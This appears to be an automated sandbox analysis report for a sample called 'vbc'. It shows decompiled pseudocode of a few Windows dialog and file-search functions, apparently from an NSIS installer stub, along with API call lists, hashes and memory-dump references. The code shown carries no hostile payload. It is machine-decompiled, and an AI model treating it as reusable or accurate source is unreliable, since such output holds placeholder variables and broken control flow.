                                          • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                                          • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
                                          • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                                          • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040666E();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                          0x00402923
                                          0x0040293e
                                          0x00402949
                                          0x0040294a
                                          0x00402a94
                                          0x00402925
                                          0x00402928
                                          0x0040292b
                                          0x0040292e
                                          0x0040292e
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                                          • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
                                          • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                                          • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405037 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8ac8;
				_v28 =  *0x7a8ab0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8ab9 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F85(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f6c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f80;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f6c = 0;
								 *0x7a1f80 = 0;
								 *0x7a8b00 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00405005();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f80;
									_t201 =  *0x7a8ac8;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8acc <= 0) {
										L86:
										if( *0x7a8b5e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8acc);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f80);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8b00 = _t291;
					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f6c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045CA(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045CA(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8acc <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f80 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f80 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8acc);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045FF(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045FF(_v12);
								L93:
								return E00404631(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                          0x0040503e
                                          0x00405057
                                          0x0040505c
                                          0x00405064
                                          0x0040506a
                                          0x00405080
                                          0x00405083
                                          0x004052ae
                                          0x004052b5
                                          0x004052c9
                                          0x004052b7
                                          0x004052b9
                                          0x004052bc
                                          0x004052bd
                                          0x004052c4
                                          0x004052c4
                                          0x004052d5
                                          0x004052e3
                                          0x004052e6
                                          0x004052fc
                                          0x00405371
                                          0x00405374
                                          0x00405376
                                          0x00405380
                                          0x0040538e
                                          0x0040538e
                                          0x00405390
                                          0x0040539a
                                          0x004053a0
                                          0x004053a3
                                          0x004053a6
                                          0x004053c1
                                          0x004053a8
                                          0x004053b2
                                          0x004053b2
                                          0x004053a6
                                          0x0040539a
                                          0x00000000
                                          0x00405374
                                          0x00405301
                                          0x0040530c
                                          0x00405311
                                          0x00405318
                                          0x0040531d
                                          0x00405321
                                          0x0040532c
                                          0x0040532c
                                          0x00405330
                                          0x00405334
                                          0x00405338
                                          0x0040534b
                                          0x0040533a
                                          0x0040533a
                                          0x00405341
                                          0x00405347
                                          0x00405343
                                          0x00405343
                                          0x00405343
                                          0x00405341
                                          0x0040534f
                                          0x00405351
                                          0x00405364
                                          0x00405367
                                          0x0040536a
                                          0x0040536a
                                          0x00405334
                                          0x00000000
                                          0x00405321
                                          0x00405303
                                          0x0040530a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004053c4
                                          0x004053c4
                                          0x004053cb
                                          0x0040543c
                                          0x00405444
                                          0x0040544c
                                          0x0040544c
                                          0x00405455
                                          0x00405457
                                          0x0040545e
                                          0x00405461
                                          0x00405461
                                          0x00405467
                                          0x0040546e
                                          0x00405471
                                          0x00405471
                                          0x00405477
                                          0x0040547d
                                          0x00405483
                                          0x00405483
                                          0x00405490
                                          0x004055f1
                                          0x004055f8
                                          0x00405615
                                          0x0040561b
                                          0x0040562d
                                          0x0040562d
                                          0x00000000
                                          0x00405496
                                          0x00405498
                                          0x0040549d
                                          0x004054a2
                                          0x004054a7
                                          0x004054a9
                                          0x004054a9
                                          0x004054aa
                                          0x004054ab
                                          0x004054ad
                                          0x004054ad
                                          0x004054b5
                                          0x004054f6
                                          0x004054f8
                                          0x00405508
                                          0x0040550b
                                          0x00405510
                                          0x00405517
                                          0x0040551a
                                          0x004055bc
                                          0x004055c5
                                          0x004055cd
                                          0x004055cd
                                          0x004055db
                                          0x004055ec
                                          0x004055ec
                                          0x00000000
                                          0x004055db
                                          0x00405520
                                          0x00405523
                                          0x00405529
                                          0x0040552e
                                          0x00405530
                                          0x00405532
                                          0x00405538
                                          0x0040553f
                                          0x00405544
                                          0x0040554b
                                          0x0040554e
                                          0x0040554e
                                          0x00405555
                                          0x00405561
                                          0x00405565
                                          0x00405567
                                          0x00405567
                                          0x00405557
                                          0x00405559
                                          0x00405559
                                          0x00405587
                                          0x00405593
                                          0x004055a2
                                          0x004055a2
                                          0x004055a4
                                          0x004055a7
                                          0x004055b0
                                          0x00000000
                                          0x004054b7
                                          0x004054c2
                                          0x004054c5
                                          0x004054ca
                                          0x004054cc
                                          0x004054d0
                                          0x004054e0
                                          0x004054ea
                                          0x004054ec
                                          0x004054ef
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004054d2
                                          0x004054d2
                                          0x004054d8
                                          0x004054da
                                          0x004054da
                                          0x004054db
                                          0x004054dc
                                          0x00000000
                                          0x004054d2
                                          0x004054b5
                                          0x00405490
                                          0x004053d3
                                          0x00000000
                                          0x004053e9
                                          0x004053f3
                                          0x004053f8
                                          0x00000000
                                          0x00000000
                                          0x0040540a
                                          0x0040540f
                                          0x0040541b
                                          0x0040541b
                                          0x0040541d
                                          0x0040542c
                                          0x0040542e
                                          0x00405432
                                          0x00405435
                                          0x00000000
                                          0x00405435
                                          0x004053d3
                                          0x00405089
                                          0x0040508e
                                          0x00405097
                                          0x0040509e
                                          0x004050b0
                                          0x004050bb
                                          0x004050c1
                                          0x004050cf
                                          0x004050e3
                                          0x004050e8
                                          0x004050f5
                                          0x004050fa
                                          0x00405110
                                          0x00405121
                                          0x0040512e
                                          0x0040512e
                                          0x00405131
                                          0x00405137
                                          0x00405139
                                          0x0040513c
                                          0x00405141
                                          0x00405146
                                          0x00405148
                                          0x00405148
                                          0x00405168
                                          0x00405168
                                          0x0040516a
                                          0x0040516b
                                          0x00405170
                                          0x00405176
                                          0x0040517a
                                          0x0040517f
                                          0x00405187
                                          0x0040518b
                                          0x00405190
                                          0x00405195
                                          0x0040519d
                                          0x004051a0
                                          0x00405270
                                          0x00405283
                                          0x00000000
                                          0x004051a6
                                          0x004051a9
                                          0x004051ac
                                          0x004051af
                                          0x004051af
                                          0x004051b5
                                          0x004051be
                                          0x004051c1
                                          0x004051c5
                                          0x004051c8
                                          0x004051cb
                                          0x004051d4
                                          0x004051dd
                                          0x004051e0
                                          0x004051e3
                                          0x004051e6
                                          0x00405224
                                          0x0040524f
                                          0x00405226
                                          0x00405235
                                          0x00405235
                                          0x004051e8
                                          0x004051eb
                                          0x004051f9
                                          0x00405203
                                          0x0040520b
                                          0x00405212
                                          0x0040521d
                                          0x0040521d
                                          0x004051e6
                                          0x00405255
                                          0x00405256
                                          0x00405262
                                          0x00405262
                                          0x0040526e
                                          0x00405289
                                          0x0040528c
                                          0x004052a9
                                          0x00000000
                                          0x0040528e
                                          0x00405293
                                          0x0040529c
                                          0x0040562f
                                          0x00405641
                                          0x00405641
                                          0x0040528c
                                          0x00000000
                                          0x0040526e
                                          0x004051a0

                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 0040504F
                                          • GetDlgItem.USER32(?,00000408), ref: 0040505A
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
                                          • LoadImageW.USER32 ref: 004050BB
                                          • SetWindowLongW.USER32 ref: 004050D4
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
                                          • DeleteObject.GDI32(00000000), ref: 00405131
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                                            • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00405275
                                          • SetWindowLongW.USER32 ref: 00405283
                                          • ShowWindow.USER32(?,00000005), ref: 00405293
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
                                          • ImageList_Destroy.COMCTL32(?), ref: 00405461
                                          • GlobalFree.KERNEL32(?), ref: 00405471
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
                                          • ShowWindow.USER32(?,00000000), ref: 0040561B
                                          • GetDlgItem.USER32(?,000003FE), ref: 00405626
                                          • ShowWindow.USER32(00000000), ref: 0040562D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 2564846305-813528018
                                          • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                                          • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
                                          • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                                          • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404789 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ff54 =  *0x79ff54 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404631(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x7a6a40;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								_t44 =  &_v8; // 0x7a6a40
								E00404A38(_a4,  *_t44);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
						goto L27;
					} else {
						_t116 =  *0x7a0f60 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A14();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
				}
				_t76 =  *0x7a8ad8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040473A;
				if(_t110 != 2) {
					_v8 = E00404700;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045CA(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045CA(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045FF(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x7a8ab0 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x79ff54 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x79ff54 = 0;
				return 0;
			}


















                                          0x0040479b
                                          0x004048c8
                                          0x00404925
                                          0x00404929
                                          0x004049f6
                                          0x004049f8
                                          0x004049f8
                                          0x004049fe
                                          0x004049fe
                                          0x00404a01
                                          0x00000000
                                          0x00404a08
                                          0x00404937
                                          0x0040493d
                                          0x00404947
                                          0x00404952
                                          0x00404955
                                          0x00404958
                                          0x00404963
                                          0x00404966
                                          0x0040496d
                                          0x0040497a
                                          0x0040498b
                                          0x00404991
                                          0x00404993
                                          0x00404999
                                          0x004049a7
                                          0x004049ad
                                          0x004049ad
                                          0x0040496d
                                          0x004049b7
                                          0x00000000
                                          0x004049c2
                                          0x004049c6
                                          0x004049d6
                                          0x004049d6
                                          0x004049dc
                                          0x004049e8
                                          0x004049e8
                                          0x00000000
                                          0x004049ec
                                          0x004049b7
                                          0x004048d3
                                          0x00000000
                                          0x004048e5
                                          0x004048ea
                                          0x004048f0
                                          0x00000000
                                          0x00000000
                                          0x00404919
                                          0x0040491b
                                          0x00404920
                                          0x00000000
                                          0x00404920
                                          0x004048d3
                                          0x004047a1
                                          0x004047a4
                                          0x004047a9
                                          0x004047ba
                                          0x004047ba
                                          0x004047c2
                                          0x004047c5
                                          0x004047c9
                                          0x004047cc
                                          0x004047d0
                                          0x004047d3
                                          0x004047d6
                                          0x004047d9
                                          0x004047e0
                                          0x004047e2
                                          0x004047e2
                                          0x004047ec
                                          0x004047f9
                                          0x00404803
                                          0x00404808
                                          0x0040480b
                                          0x00404810
                                          0x00404827
                                          0x0040482e
                                          0x00404841
                                          0x00404844
                                          0x00404858
                                          0x0040485f
                                          0x00404864
                                          0x00404869
                                          0x00404869
                                          0x00404877
                                          0x00404885
                                          0x00404897
                                          0x0040489c
                                          0x004048ac
                                          0x004048ae
                                          0x00000000

                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040483B
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
                                          • GetSysColor.USER32 ref: 00404869
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
                                          • lstrlenW.KERNEL32(?), ref: 0040488A
